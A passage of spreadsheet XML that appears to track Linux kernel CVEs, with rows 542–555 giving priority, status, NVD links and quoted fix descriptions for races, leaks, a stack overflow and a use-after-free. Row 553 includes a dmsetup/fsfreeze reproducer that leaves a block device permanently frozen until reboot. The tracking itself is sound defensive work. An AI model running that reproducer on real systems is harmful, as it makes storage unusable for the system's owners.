      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr"/>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: use option bits for CFM/MRP frame handlers
CFM and MRP register a global br_frame_type whose hlist_node is linked
into the per-bridge frame_type_list when the first MEP/MRP instance is
created. Enabling the protocol on multiple bridges therefore inserts the
same node into multiple lists. Unregistering it on one bridge then
corrupts list state belonging to another.
These handlers can only be installed once per bridge, and they are
uncommon. Track their per-bridge enable state with net_bridge option
bits, which already live on the Rx hot cache line, and dispatch the
matching handler directly from the receive path. Check both bits
together first as an unlikely case.
Remove the generic frame_type_list and br_frame_type helpers, which
have had no other users since CFM and MRP were added. That shrinks
struct net_bridge by 8 bytes and drops the list walk from the fast
path. When neither protocol is compiled in, BR_CFM_MRP_OPTS is 0 and
the compiler prunes the branch.</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97615</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97616</t>
        </is>
      </c>
      <c r="D543" s="5" t="inlineStr"/>
      <c r="E543" s="5" t="inlineStr"/>
      <c r="F543" s="5" t="inlineStr"/>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr"/>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_api: release all action references on NEWACTION failure
When a batched RTM_NEWACTION request replaces an existing action,
tcf_idr_check_alloc() takes a temporary reference on it. If a later
action fails to initialize, tcf_action_destroy() uses strict release
semantics to clean up the actions initialized so far. For an action
bound to a filter, the strict check returns -EPERM without dropping
the temporary reference.
This error also makes tcf_action_destroy() return before releasing
subsequent entries. Any new action initialized between the bound
action and the failing entry is leaked together with its reserved
IDR slot, preventing reuse of its index.
Use tcf_idr_release() to drop each reference held by the batch without
rejecting bound actions. This allows cleanup to continue through all
initialized entries and preserves the module reference release when
an action is destroyed. Explicit action deletion and flushing retain
their separate bind-count checks.</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97616</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97617</t>
        </is>
      </c>
      <c r="D544" s="5" t="inlineStr"/>
      <c r="E544" s="5" t="inlineStr"/>
      <c r="F544" s="5" t="inlineStr"/>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr"/>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Check resize_disabled before publishing the new subbuf order
ring_buffer_subbuf_order_set() stores the new order and only then walks
the CPUs, returning -EBUSY if any of them has resizing disabled. A user
mapped buffer has resizing disabled, and __rb_map_vma() reads
buffer-&gt;subbuf_order without buffer-&gt;mutex, so an mmap of an already
mapped CPU racing the failing order change sizes the mapping with the
new order and inserts pages past the sub-buffer into the VMA.
Check the CPUs before storing the new order.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97617</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97618</t>
        </is>
      </c>
      <c r="D545" s="5" t="inlineStr"/>
      <c r="E545" s="5" t="inlineStr"/>
      <c r="F545" s="5" t="inlineStr"/>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr">
        <is>
          <t>github</t>
        </is>
      </c>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr"/>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/net: don't overconsume buffers when using MSG_TRUNC
When a recv/recvmsg is issued with MSG_TRUNC and the incoming packet is
larger than the provided buffer, the net layer returns the full length
of the packet rather than the number of bytes actually copied into the
buffer.  As a result, io_uring advances more of the provided buffer ring
than was actually filled.  Use the actual filled region size to consume
the buffer, but still return the full size to preserve MSG_TRUNC
semantics.
Take care with multishot, because that seems to already truncate the
consumption based on the available payload size.
This was reported in https://github.com/axboe/liburing/issues/1619.
[axboe: fold in size_t unsigned fix]</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97618</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97619</t>
        </is>
      </c>
      <c r="D546" s="5" t="inlineStr"/>
      <c r="E546" s="5" t="inlineStr"/>
      <c r="F546" s="5" t="inlineStr"/>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr"/>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/rw: end write accounting from -&gt;ki_complete
Commit b000145e9907 moved both the fsnotify calls and the write
accounting out of the kiocb completion handler and into the
io_req_rw_complete() task_work. However, only the fsnotify part actually
needed to move as it may sleep. Ending the write accounting is just a
percpu_up_read() on the superblock writers sem.
Deferring it is a problem, because it makes dropping SB_FREEZE_WRITE
protection depend on the ring owner getting to running task_work. But
the task may be blocked in freeze_super(), causing it to never get to
that:
  task                             io-wq worker
  --------------------------------------------------------------
  io_write()
    io_kiocb_start_write()         (takes sb_writers, hidden from
                                    lockdep by __sb_writers_release)
    write_iter() -&gt; -EIOCBQUEUED
  ioctl(FS_IOC_SHUTDOWN)
    bdev_freeze()
      freeze_super()
        percpu_down_write()        &lt;- waits for the reader above
                                   io_write()
                                     kiocb_start_write()
                                       percpu_down_read()  &lt;- queued
                                                              behind the
                                                              writer
  &lt;bio completes&gt;
    io_complete_rw()
      queues io_req_rw_complete()  &lt;- never runs, task is in D state
End the write from io_complete_rw() instead, and leave only the fsnotify
calls in task_work.</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97619</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97620</t>
        </is>
      </c>
      <c r="D547" s="5" t="inlineStr"/>
      <c r="E547" s="5" t="inlineStr"/>
      <c r="F547" s="5" t="inlineStr"/>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr"/>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Flush LSC untyped L1 dataport cache after rcs/ccs batches
emit_render_cache_flush() sets PIPE_CONTROL0_HDC_PIPELINE_FLUSH to
flush the L2/HDC data cache before fence signalling, but it never
requests a flush of the LSC untyped L1 data cache via the 'Untyped
Data-Port Cache Flush Enable' bit in PIPE_CONTROL DWord0[11].
Per the Bspec, in 3D pipeline mode HDC Pipeline Flush is documented to
also flush/invalidate the untyped L1 cache, but only depending on how
HDC_CHICKEN0[13:11] is programmed. Starting with MTL, this coupling
between HDC Pipeline Flush and the untyped L1 cache flush no longer
holds in practice, regardless of how HDC_CHICKEN0 is programmed, so
relying on it is not safe on newer platforms such as BMG. Mesa's Vulkan
driver (anv) has been assuming the kernel flushes both caches between
submissions, and hit user-visible corruption in apps such as Llama.cpp
because of this gap; it now works around it by flushing both caches
again from userspace at the end of every command buffer.
Correctness between submissions on the same queue is userspace's
responsibility and belongs in Mesa, not the kernel. However, for
security we must ensure stale data can't leak through the untyped L1
dataport cache once memory is reclaimed or evicted, which requires the
KMD to flush it before releasing memory for reuse.
Prior to MTL, HDC_CHICKEN0 could be programmed (as already done for
DG2 via Wa_22010960976/Wa_14013347512) to reliably keep HDC Pipeline
Flush coupled to the untyped L1 cache flush, so those platforms are
unaffected. Mesa's own anv driver found that on MTL the HW
disconnected the two independently of how HDC_CHICKEN0 is programmed,
and could not bring the old behavior back even by writing the register
by hand; see Mesa commit 7c2ff46a4fc3 ("anv: don't prevent L1 untyped
cache flush in 3D mode"). The kernel can't reliably request the flush
from the CS on MTL either, so restrict the new PIPE_CONTROL bit to
GRAPHICS_VERx100 &gt;= 2000 (Xe2 and later), where it can be relied on.
Explicitly set PIPE_CONTROL0_UNTYPED_DATAPORT_CACHE_FLUSH together
with PIPE_CONTROL0_HDC_PIPELINE_FLUSH in emit_render_cache_flush() on
Xe2 and later, so the L1 data cache is known clean before memory is
released for reuse, without depending on undocumented
platform-specific HDC_CHICKEN0 behavior.
Bspec: 56551
(cherry picked from commit 434514b6fe731e873808297c268fc52cdf4a1ce6)</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97620</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97621</t>
        </is>
      </c>
      <c r="D548" s="5" t="inlineStr"/>
      <c r="E548" s="5" t="inlineStr"/>
      <c r="F548" s="5" t="inlineStr"/>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr"/>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/rockchip: analogix_dp: fix unchecked bound endpoint name length
rockchip_dp_drm_encoder_enable() uses sprintf() to format a device tree
path into a 32-byte stack buffer. Device tree paths are not limited to
this size, so a sufficiently long path can overflow the buffer.
Use snprintf() with the destination size to truncate the generated name
and keep the writes within bounds.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97621</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97622</t>
        </is>
      </c>
      <c r="D549" s="5" t="inlineStr"/>
      <c r="E549" s="5" t="inlineStr"/>
      <c r="F549" s="5" t="inlineStr"/>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr"/>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-62062. Reason: This candidate is a reservation duplicate of CVE-2026-62062. Notes: All CVE users should reference CVE-2026-62062 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97622</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97899</t>
        </is>
      </c>
      <c r="D550" s="5" t="inlineStr"/>
      <c r="E550" s="5" t="inlineStr"/>
      <c r="F550" s="5" t="inlineStr"/>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr"/>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/i915: Fix memory leak in query_perf_config_list()
When krealloc() fails, free the original oa_config_ids before returning
to avoid a memory leak.
(cherry picked from commit 9977e9d84f46d4f12ad35fbbc0ec4638554bce87)</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97899</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97900</t>
        </is>
      </c>
      <c r="D551" s="5" t="inlineStr"/>
      <c r="E551" s="5" t="inlineStr"/>
      <c r="F551" s="5" t="inlineStr"/>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="inlineStr"/>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr"/>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/drm_exec: fix up contended obj when num_objects is 0
drm_exec_prepare_array() silently returns success without calling
drm_exec_lock_contended() when num_objects is zero. This breaks the
invariant upheld by drm_exec_lock_obj(), where every entry point into
the locking sequence must first attempt to lock any previously
contended object before proceeding.
Drivers that chain multiple drm_exec_prepare_array() calls per
drm_exec_until_all_locked() iteration (e.g. amdgpu's userq signal/wait
ioctls, which prepare separate read and write BO arrays) can pass an
empty array for one of the two calls. If contention is hit while
preparing the non-empty array, exec-&gt;contended is set and the loop
retries; on retry, the empty-array call preceding it is a no-op that
never clears exec-&gt;contended, so drm_exec_retry_on_contention()
immediately jumps back to the top of the loop without ever reaching
the call that would resolve the contention. This spins forever.
Fix it by having drm_exec_prepare_array() call drm_exec_lock_contended()
directly when num_objects is zero, so a pending contended object dont
loop infinitely.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97900</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97901</t>
        </is>
      </c>
      <c r="D552" s="5" t="inlineStr"/>
      <c r="E552" s="5" t="inlineStr"/>
      <c r="F552" s="5" t="inlineStr"/>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="inlineStr"/>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr"/>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
genetlink: pin family module during policy dump
The generic netlink controller's policy dump keeps pointers to the target
family's operation and policy tables in its callback state.  A dump may be
split across multiple skbs and remain pending after the initial request.
Netlink pins the module which owns the dump callback, but in this case
that is the controller's owner rather than the target family's owner.  The
target family can consequently be unregistered and its module unloaded
while a policy dump is pending.  Advancing the dump then dereferences
policy memory from the unloaded module.
Take a reference to the target family's module when the dump starts.
Drop it from the error and done paths.  This matches the lifetime for which
the dump context retains the family and policy pointers.</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97901</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97902</t>
        </is>
      </c>
      <c r="D553" s="5" t="inlineStr"/>
      <c r="E553" s="5" t="inlineStr"/>
      <c r="F553" s="5" t="inlineStr"/>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr">
        <is>
          <t>aws, gin</t>
        </is>
      </c>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr"/>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs: don't return -EINVAL for successful nested thaw
Commit 7366f8b6fc6a ("fs: handle freezing from multiple devices")
replaced the freeze_holders bitmask with per-holder counters to allow
nested freezes. In the bitmask version, a thaw that released a shared
hold while another holder remained returned 0. Since the rework,
thaw_super_locked() drops the freeze reference via freeze_dec() but
then returns -EINVAL when other freezers remain, misinforming the
caller: the thaw did succeed, the superblock just stays frozen for the
remaining holders.
This breaks bdev-initiated freezing. When a filesystem is frozen with
FIFREEZE and additionally frozen via bdev_freeze() -- which nests by
design, see fs_bdev_freeze() -- the subsequent bdev_thaw() receives
-EINVAL from the holder op although its freeze reference was dropped,
and therefore keeps bd_fsfreeze_count elevated. Then device-mapper's
unlock_fs() ignores bdev_thaw()'s return value, so nothing rebalances
the count. After the user's FITHAW and umount, the block device can
never be mounted again:
    dm-1: Can't mount, blockdev is frozen
There is no way for userspace to drop the leaked count; only
destroying the block device (or a reboot) recovers the device.
Reproducer (any kernel since v6.8):
    dmsetup create dut --table "0 $(blockdev --getsz "$DEV") linear $DEV 0"
    mkfs.ext4 /dev/mapper/dut
    mount /dev/mapper/dut /mnt
    fsfreeze --freeze /mnt      # freeze_ucount == 1
    dmsetup suspend dut         # bd_fsfreeze_count == 1, ucount == 2
    dmsetup resume dut          # ucount 2 -&gt; 1, but thaw_super()
                                # returns -EINVAL, so bdev_thaw()
                                # keeps bd_fsfreeze_count at 1
    fsfreeze --unfreeze /mnt    # filesystem thaws fine
    umount /mnt
    mount /dev/mapper/dut /mnt  # EBUSY, forever
The same happens with fsfreeze held across an LVM snapshot of the
origin volume.
fs_bdev_thaw()'s documentation already describes the intended
semantics: "If this function returns zero it doesn't mean that the
filesystem is unfrozen as it may have been frozen multiple times".
Restore them by returning 0 when a nested thaw drops its hold while
other freezers remain. Thawing without holding a freeze still fails
with -EINVAL as may_unfreeze() rejects that case before the reference
count is touched.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97902</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97904</t>
        </is>
      </c>
      <c r="D554" s="5" t="inlineStr"/>
      <c r="E554" s="5" t="inlineStr"/>
      <c r="F554" s="5" t="inlineStr"/>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="inlineStr"/>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr"/>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: initialize policy rwsem before sysfs publication
cpufreq_policy_alloc() initializes policy-&gt;rwsem after
kobject_init_and_add() has created the policy sysfs directory and its
default attributes. A sysfs access can therefore reach a policy callback
before the semaphore has been initialized.
Initialize policy-&gt;rwsem before publishing the policy kobject so sysfs
callbacks always see an initialized semaphore.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97904</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97905</t>
        </is>
      </c>
      <c r="D555" s="5" t="inlineStr"/>
      <c r="E555" s="5" t="inlineStr"/>
      <c r="F555" s="5" t="inlineStr"/>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="inlineStr"/>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr"/>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: zero-initialize policy cpumask before sysfs publication
cpufreq_policy_alloc() allocates policy-&gt;cpus with alloc_cpumask_var(),
i.e. without __GFP_ZERO, unlike the sibling related_cpus and real_cpus
masks. With CONFIG_CPUMASK_OFFSTACK=y the mask is a separate
kmalloc_node() allocation, so its bitmap holds whatever the slab allocator
left behind:
  cpufreq_online()
